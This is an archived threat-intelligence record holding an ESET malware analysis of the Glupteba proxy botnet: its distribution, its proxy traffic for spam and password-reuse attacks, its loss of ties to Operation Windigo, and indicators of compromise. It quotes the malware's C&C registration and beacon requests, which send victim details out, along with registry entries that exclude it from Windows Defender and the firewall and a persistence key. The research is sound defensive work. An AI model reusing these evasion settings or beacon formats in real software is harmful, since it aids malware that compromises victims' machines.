{
	"id": "9d017ba0-5534-4b65-97c5-fc20e27f2788",
	"created_at": "2026-04-06T00:17:23.39916Z",
	"updated_at": "2026-04-10T13:11:42.46731Z",
	"deleted_at": null,
	"sha1_hash": "b00bf0e53b018a12287820b6f2f255929c8ae5f9",
	"title": "Glupteba is no longer part of Windigo",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 317680,
	"plain_text": "Glupteba is no longer part of Windigo\r\nBy Frédéric Vachon\r\nArchived: 2026-04-05 22:24:35 UTC\r\nOur recent research on Linux/Ebury, the core component of Operation Windigo, led us to look at other components in\r\nWindigo’s ecosystem to see if they are still active and part of the same operation. During this process, we took a look at\r\nWin32/Glupteba, an open proxy previously distributed by exploit kits deployed as part of Operation Windigo. The result of\r\nour latest analysis strongly suggests that Glupteba is no longer tied to Operation Windigo.\r\nIn this blog post, we share the results of our investigation. We provide information about the current distribution\r\nmechanisms of Glupteba, a short analysis of the network traffic going through the proxy, and we discuss the relationship\r\nbetween Glupteba and Windigo. Finally, we give a technical analysis of the current state of the Glupteba binary.\r\nGlupteba distribution over time\r\nBrief history\r\nOver time, Glupteba is known to have used various distribution methods. ESET researchers have tracked the distribution of\r\nGlupteba for the last seven years. We’ll give a brief overview of its evolution.\r\nBack in 2011, ESET researchers working on the infamous TDL-4 bootkit discovered that, as explained in this blogpost, it\r\nwas being used as a downloader to fetch additional malware. Glupteba was found to be one of many malware variants it\r\ninstalled. TDL-4 operators were most likely selling a distribution service on black markets.\r\nThree years later, ESET’s investigation into Operation Windigo revealed that part of the attackers' infrastructure of\r\ncompromised Linux servers was used to redirect a certain proportion of HTTP requests through trojanized instances of web\r\nservers (Apache httpd, lighttpd and nginx). Redirected requests would hit DNS servers under the control of Windigo’s\r\noperators, which resolved the A record to the IP address of the final redirection targets. These usually hosted exploit kits.\r\nUpon successful exploitation, Glupteba would be installed.\r\nThe ties between Windigo and Glupteba didn’t end there. Glupteba’s C\u0026C servers were also hosted on machines that were\r\npart of Windigo’s botnet. Furthermore, the sole purpose of Glupteba at the time was to relay spam jobs fetched from\r\nWindigo’s infrastructure. It is, however, hard to say if Glupteba was operated by the same individuals as the Windigo botnet\r\nor if it was some kind of service provided by Windigo’s operators reselling usage of their infrastructure.\r\nCurrent distribution scheme\r\nOnce again, Glupteba’s distribution vector changed. It is not distributed via Windigo’s infrastructure anymore. Glupteba is\r\nnow part of its own botnet and is distributed by MSIL/Adware.CsdiMonetize.AG, which is used to install many different\r\nmalware families – suggesting a Pay-Per-Install scheme. In addition to installing Glupteba, we’ve seen it deploying Adware,\r\nBitcoin mining agents and various PUAs (Potentially Unwanted Applications). MSIL/Adware.CsdiMonetize.AG doesn’t\r\ndirectly install Glupteba.AY; instead it downloads its dropper, which is responsible for registering the bot to its C\u0026C, adding\r\nexclusions to Windows Defender and the Windows firewall as well as setting the environment to install Glupteba.\r\nThe query to register the bot contains multiple pieces of information about the victim’s machine. Here’s an example of such\r\na query:\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 1 of 11\n\nPOST /bots/register HTTP/1.1\r\nHost: burnandfire5.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 400\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip \r\nData[appname]=SolitaryBrook\u0026Data[arch]=32\u0026Data[av]=\u0026Data[build_number]=7601\u0026Data[compaign_id]=\u0026Data[cpu]=\r\n\u003cCPU_SPEC\u003e\u0026Data[defender]=1\u0026Data[exploited]=1\u0026Data[firewall]=1\u0026Data[gpu]=\r\n\u003cGPU_INFO\u003e\u0026Data[is_admin]=1\u0026Data[os]=\u003cOS_INFO\u003e\u0026Data[username]=\u003cUSERNAME\u003e\u0026Data[version]=71\r\nThe Windows Registry value HKCU\\Software\\Microsoft\\TestApp\\UUID is also created. It is needed by Glupteba to execute\r\nsuccessfully. This value’s data must not be empty.\r\nFinally, the following registry entries are created to add exclusion rules to Windows Defender and the Windows Firewall:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Roaming\\EpicNet\r\nInc\\CloudNet = 0HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\cloudnet.exe =\r\n0HKLM\\SYSTEM\\ControlSet001\\services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\{09E3DB75-DE77-\r\n4B2D-A351-C745D9A15617} = \"v2.10|Action=Allow|Active=TRUE|Dir=In|App=C:\\Users\\\r\n\u003cUSERNAME\u003e\\AppData\\Roaming\\EpicNet Inc\\CloudNet\\cloudnet.exe\"\r\nAccording to ESET’s telemetry, Glupteba has been seen in 180 different countries since the beginning of 2017. Three\r\ncountries jointly account for 25% of all detections – Ukraine, the Russian Federation and Turkey. Figure 1 shows the\r\ndistribution per country of the detections we observed.\r\nFigure 1. Distribution of detections per country\r\nProxy usage analysis\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 2 of 11\n\nDuring ESET's research into Operation Windigo, Glupteba's sole purpose was to relay spam jobs to their final recipients. We\r\nwanted to see if the use of Glupteba has changed since then. During November 2017, we captured network traffic going\r\nthrough an infected node for a duration of four days. Note that we didn’t decrypt the HTTPS traffic, so our visibility was\r\nlimited to non-encrypted network protocols. Our analysis showed that Glupteba is no longer limited to sending spam. It is\r\nnow primarily used by various automated systems. While Glupteba’s operators might use the proxy, we do believe that the\r\nuse of Glupteba is sold to third-party users as a proxy service. Here, we provide information about the most interesting\r\ntraffic we observed.\r\nThe first thing we noticed is that Glupteba is still used to relay spam messages to their final recipients. Here’s an example of\r\na spam message:\r\nFrom: \"Ella Dmhfey\" \u003cElla87@bilanzgewinn.at\u003e\r\nTo: \"???????\" \u003c??????????@gmail.com\u003e\r\nSubject: ?????????? kaufen Sie Se-xpower\r\nDate: Fri, 10 Nov 2017 14:18:10 +0100\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;   \r\ncharset=\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\nGuten Tag ????????? , \r\nDamit kriegen Sie Ihre Dame zum Hoehepunkt. \r\n?????????: http://www.sexpillen-versandhaus[.]info/shop\r\nWe’ve also seen Glupteba used to attempt password-reuse attacks. Glupteba provides some level of anonymity to the\r\nattackers since the IP address of the proxy user is never exposed to the actual targeted server. Moreover, it allows spreading\r\nthe queries across multiple IP addresses, thus reducing the risk of being banned by the website targeted by the password-reuse attack. We’ve seen such attacks performed on three domains:\r\nTable 1. Domains targeted that don’t use HTTPS #colspan#\r\nDomain name Short description\r\nadfoc.us URL shortener service where users are paid per visit\r\nbonusbitcoin.co Free bitcoin faucet website\r\nsocial.tunecore.com Music distribution website\r\nThere are probably more targeted domains. Based on the server_name extension field of the ClientHello structure used\r\nduring the TLS handshake, we know the domain names that were accessed even when HTTPS was used. This gives insight\r\ninto what websites may have been targeted. Table 2 a list of such domain names along with the associated authentication\r\nURLs. They are sorted with the most frequently visited on the top.\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 3 of 11\n\nTable 2. Domains in server_name\r\ncertificate field\r\n#colspan#\r\nServer name Authentication URL\r\nauth.mail.ru https://auth.mail.ru/cgi-bin/auth\r\nwww.instagram.com https://www.instagram.com/accounts/login/ajax/\r\nstore.steampowered.com https://store.steampowered.com/login/dologin/\r\nwww.amazon.com https://www.amazon.com/ap/signin\r\nauth.riotgames.com https://auth.riotgames.com/authz/auth\r\nvk.com https://vk.com/login\r\nglobal.americanexpress.com https://global.americanexpress.com/myca/logon/emea/action\r\nwww.facebook.com https://www.facebook.com/login/device-based/regular/login/\r\nsignin.ea.com https://signin.ea.com/p/web2/login\r\naccount.t-mobile.com https://account.t-mobile.com/svr/authenticate\r\nwww.linkedin.com https://www.linkedin.com/uas/login-submit\r\nwww.westernunion.com https://www.westernunion.com/wuconnect/rest/api/v1.0/CustomerSignOn\r\nwww.paypal.com https://www.paypal.com/signin\r\nwww.britishairways.com https://www.britishairways.com/api/grant\r\nauth.api.sonyentertainmentnetwork.com https://auth.api.sonyentertainmentnetwork.com/login.jsp\r\naccount.sonymobile.com https://account.sonymobile.com/api/ng/signin\r\nwww.expedia.com https://www.expedia.com/user/signin\r\nAnother example of a user proxying automated system traffic through Glupteba targeted www.omegle.com. Omegle is a\r\nwebsite where two strangers can meet in a private chat room. What we observed is a bot joining a chat room and trying to\r\ntrick the other user into clicking a link. It seems that this service is a popular target for bots. Most of the interactions we\r\ncaptured were between two bots trying to lure each other into either joining Kik Messenger, an instant messaging mobile\r\napp, or clicking shortened URLs that redirect to adult websites.\r\nExample of two bots interacting with each other:\r\nguest\u003e heyy\r\nstranger\u003e my name is Tomasa\r\nstranger\u003e im female   .\r\nstranger\u003e from Rio de aneiro,Brazil\r\nstranger\u003e ready to talk, enter here:\r\nstranger\u003e bit.ly/\u003cREDACTED\u003e\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 4 of 11\n\nguest\u003e 18 female\r\nguest\u003e wanena etrade picturesh ?\r\nguest\u003e zyari.site/\u003cREDACTED\u003e\r\nguest\u003e messsage me theree ill sendc you sxome mor8e\r\nguest\u003e ok we2ll im goinn 2 getwt off bye\r\nWe’ve also come across bots trying specially crafted HTTP POST requests in an attempt to find webshells. Domains were\r\ntried one after the other in ascending alphabetical order, which suggests they are programmatically processing a list of\r\ndomains.\r\nDiscussing links with Windigo\r\nWhen we decided to revisit Glupteba, it was primarily because we wanted to see if it was still associated with Operation\r\nWindigo;  our analysis leads us to believe that the two are no longer affiliated. Let us provide the reasons for such\r\nconclusions.\r\nThe first thing we looked at is the C\u0026C servers used by Glupteba. Enumerating the IP addresses we found, none of them\r\nmatched any previously known Ebury-compromised servers. Moreover, the new C\u0026C servers have a lot of ports open, while\r\nthe previous ones had only one DNAT and one SNAT rule to reroute the traffic to the actual C\u0026C server. Having so many\r\nports open on a compromised server would be very noisy, which is not the modus operandi of Windigo’s operators.\r\nAs documented in the Operation Windigo whitepaper, the client connecting to Glupteba used to send an HTTP GET request\r\non port 25 to a machine compromised by Ebury before starting to send spam jobs. This is no longer the case: spam jobs go\r\ndirectly through the proxy without any kind of prologue. Also, the spam messages themselves don’t look like those we used\r\nto see during Operation Windigo, where the messages led to a dating website. While it could be argued that the current spam\r\nmessages, trying to sell sexual enhancement pills to \"get your lady to the climax\", are a logical sequel to the previous one,\r\nwe believe they are unrelated.\r\nFinally, the distribution itself is not related to Windigo anymore. As mentioned previously, it is now distributed by\r\nMSIL/Adware.CsdiMonetize.AG.\r\nFor all these reasons, we believe that Glupteba is no longer linked with Operation Windigo.\r\nTechnical analysis\r\nIn this section, we provide a technical analysis of the samples of Glupteba we looked at during this research. The first thing\r\nwe noticed is that the current samples don’t look like those we analyzed back in 2014. We believe Glupteba has been\r\nrewritten from scratch. Whereas Glupteba used to be a fairly small and simple program, nowadays it has become a huge and\r\nvery complex C++ program. It used to have around 70 functions. Now, it has more than 3600 functions.\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 5 of 11\n\nFigure 2. Functions list comparison\r\nGlupteba now statically links to the Boost C++ libraries as shown in Figure 3. To communicate over sockets, it uses the\r\nWindows Sockets APIs WSASend and WSARecv instead of send and recv.\r\nFigure 3. Boost C++ library related strings\r\nPersistence\r\nGlupteba acquires persistence by adding an entry in the Run registry key. Thus, every time Windows boots up, Glupteba will\r\nbe launched. Here’s the entry that is created:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\CloudNet =  \"%APPDATA%\\EpicNet\r\nInc\\CloudNet\\cloudnet.exe\"\r\nOther entare also created in the Windows Registry. The most interesting are the following:\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 6 of 11\n\nHKCU\\Software\\EpicNet Inc.\\CloudNet\\Value = \"20180223\"\r\nHKCU\\Software\\EpicNet Inc.\\CloudNet\\GUID = \"CDC0432A-0298-40B1-9A71-D61F94C013A7\"\r\nThe GUID entry is set to the bot id that is created via a call to CoCreateGuid. As for the Value entry, it contains the PE\r\ntimestamp of Glupteba’s binary.\r\nC\u0026C communication\r\nFrom a networking perspective, there are no significant changes between the samples we documented in our Operation\r\nWindigo paper and the current version. When launched, Glupteba sends the same beacon to its C\u0026C and the response\r\ncontains the session and the port that Glupteba will connect to for retrieval of the proxying jobs. Refer to the earlier\r\nwhitepaper for more information about the protocol.\r\nBeacon sent to the C\u0026C:\r\nGET\r\n/stat?\r\nuptime=100\u0026downlink=1111\u0026uplink=1111\u0026id=05AA812F\u0026statpass=bpass\u0026version=20171106\u0026features=30\u0026guid=68794E51\r\n0DBC-4CF6-BD98-8B18FE3E0A18\u0026comment=20171106\u0026p=0\u0026s= HTTP/1.0\r\nThe C\u0026C servers are stored encrypted in the binary. Once decrypted, they look like this:\r\n'server-%s.sportpics[.]xyz:30,server-%s.kinosport[.]top:30,'\r\nThe number after the colon is the maximum range of the server numbers. In this case, '30' means that there are 30 domain\r\nnames generated by formatting the domain string with numbers from 1 to 30. When contacting the C\u0026C server, one of those\r\ndomains is randomly selected and the GUID of the compromised machine is prepended as a subdomain to the chosen server\r\nresulting in a domain like this:\r\nExample of a C\u0026C server:\r\n68794E51-0DBC-4CF6-BD98-8B18FE3E0A18.server-1.sportpics[.]xyz\r\nGlupteba also sends a second GET request to its C\u0026C server in order to update information about the victim’s machine\r\nspecifications. Here’s what the request looks like:\r\nGET\r\n/update.php?uid=\u003cBOT_ID\u003e\u0026version=\u003cVERSION\u003e\u0026OS=\u003cOS\u003e\u0026have_admin=1\u0026mys=\u003cC\u0026C_SERVERS\u003e\u0026build=\r\n\u003cPE_TIMESTAMP\u003e\u0026cpu=\u003cCPU\u003e\u0026video=\u003cVIDEO_CARD\u003e\u0026ram=\u003cGB_OF_RAM\u003e HTTP/1.0\r\nString encryption\r\nGlupteba’s strings are encrypted using a custom algorithm. The decryption process uses a 16-byte key and has three separate\r\nphases. The key is different for each build. During the first phase, the Mersenne Twister pseudorandom number generator\r\n(PRNG) is used. The algorithm is seeded with the first four bytes of the key. Then, each byte of the cipher is XORed with\r\nthe next byte generated by the PRNG.\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 7 of 11\n\nFigure 4. Phase One of the decryption process\r\nThere are three different variants of the second phase. One uses the Rabbit cipher; another uses a second round of XOR\r\noperations similar to the one from the first phase, but with a different seed derived from the key. The only variant that is\r\nused in the samples we analyzed is the third one. It consists of an XOR loop with the key.\r\nThe third and final phase is another XOR loop with a value that is computed from the output of the second phase and some\r\nimmediate values.\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 8 of 11\n\nFigure 5. Phase Three of the decryption process\r\nIn our GitHub repository, we provide a script to decrypt all the strings. Since the Mersenne Twister PRNG implementation\r\nof Python varies a bit from the one used by Glupteba, we also provide a Python implementation of the PRNG. Make sure the\r\ndirectory where it is located is in your %PYTHONPATH% before launching the string decryption script. You can do so by\r\nrunning this command in IDA’s Python interpreter:\r\nsys.path.append(\u003cPATH_TO_SCRIPT\u003e)\r\nConclusion\r\nThe Glupteba operators persist in finding ways to distribute their malware despite the relentless efforts of the information\r\nsecurity community to disrupt their operations. After the exposure of Operation Windigo, they just moved to other tactics to\r\nget their malware spread to computers all around the globe.\r\nThe complete rewriting of their tools and its current distribution shows that the individuals behind Glupteba are still very\r\nactive. Such efforts suggest that the open proxy market must be a very lucrative one, and that we’re unlikely to witness the\r\ndisappearance of Glupteba in the near future.\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 9 of 11\n\nIoCs\r\nFile hashes #colspan# #colspan#\r\nSHA-1 Filename Detection name\r\nB623F4A6CD5947CA0016D3E33A07EB72E8C176BA cloudnet.exe Win32/Glupteba.AY\r\nED310E5B9F582B4C6389F7AB9EED17D89497F277 cloudnet.exe Win32/Glupteba.AY\r\nF7230B2CAB4E4910BCA473B39EE8FD4DF394CE0D setup.exe MSIL/Adware.CsdiMonetize.AG\r\n70F2763772FD1A1A54ED9EA88A2BCFDB184BCB91 cloudnet.exe Win32/Glupteba.AY\r\n87AD7E248DADC2FBE00D8441E58E64591D9E3CBE cloudnet.exe Win32/Glupteba.AY\r\n1645AD8468A2FB54763C0EBEB766DFD8C643F3DB csrss.exe Win32/Agent.SVE\r\nGlupteba C\u0026C server domains\r\nserver-{1,30}[.]ostdownload.xyz\r\nserver-{1,30}[.]travelsreview.world\r\nserver-{1,30}[.]bigdesign.website\r\nserver-{1,30}[.]sportpics.xyz\r\nserver-{1,30}[.]kinosport.top\r\nserver-{1,30}[.]0ev.ru\r\nserver-{1,30}[.]0df.ru\r\nserver-{1,30}[.]0d2.ru\r\nserver-{1,30}[.]0d9.ru\r\nGlupteba C\u0026C server IP addresses\r\n5[.]101.6.132\r\n5[.]79.87.139\r\n5[.]79.87.153\r\n5[.]8.10.194\r\n37[.]48.81.151\r\n46[.]165.244.129\r\n46[.]165.249.167\r\n46[.]165.249.195\r\n46[.]165.249.201\r\n46[.]165.249.203\r\n46[.]165.250.25\r\n78[.]31.67.205\r\n78[.]31.67.206\r\n80[.]93.90.27\r\n80[.]93.90.32\r\n80[.]93.90.69\r\n80[.]93.90.72\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 10 of 11\n\n80[.]93.90.78\r\n80[.]93.90.84\r\n81[.]30.152.25\r\n85[.]114.135.113\r\n85[.]114.141.81\r\n89[.]163.206.137\r\n89[.]163.206.174\r\n89[.]163.212.9\r\n91[.]121.65.98\r\n91[.]216.93.126\r\n91[.]216.93.20\r\n109[.]238.10.78\r\n178[.]162.193.193\r\n178[.]162.193.195\r\n178[.]162.193.66\r\n178[.]162.193.86\r\n193[.]111.140.238\r\n193[.]111.141.213\r\n212[.]92.100.114\r\n212[.]92.100.115\r\n213[.]202.254.161\r\n213[.]5.70.9\r\n217[.]79.189.227\r\nAgent.SVE C\u0026C server domains\r\nfinancialtimesguru[.]com\r\ncomburnandfire5[.]com\r\nSource: https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nhttps://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/"
	],
	"report_names": [
		"glupteba-no-longer-windigo"
	],
	"threat_actors": [
		{
			"id": "1934b371-2525-4615-a90a-772182bc4184",
			"created_at": "2022-10-25T15:50:23.396576Z",
			"updated_at": "2026-04-10T02:00:05.341979Z",
			"deleted_at": null,
			"main_name": "Windigo",
			"aliases": [
				"Windigo"
			],
			"source_name": "MITRE:Windigo",
			"tools": [
				"Ebury"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3844202f-b24a-4e16-b7b9-dfe8c0a44d5d",
			"created_at": "2022-10-25T16:07:24.526179Z",
			"updated_at": "2026-04-10T02:00:05.023222Z",
			"deleted_at": null,
			"main_name": "Operation Windigo",
			"aliases": [
				"G0124"
			],
			"source_name": "ETDA:Operation Windigo",
			"tools": [
				"CDorked",
				"CDorked.A",
				"Calfbot",
				"Ebury"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434643,
	"ts_updated_at": 1775826702,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.pdf",
		"text": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.txt",
		"img": "https://archive.orkl.eu/b00bf0e53b018a12287820b6f2f255929c8ae5f9.jpg"
	}
}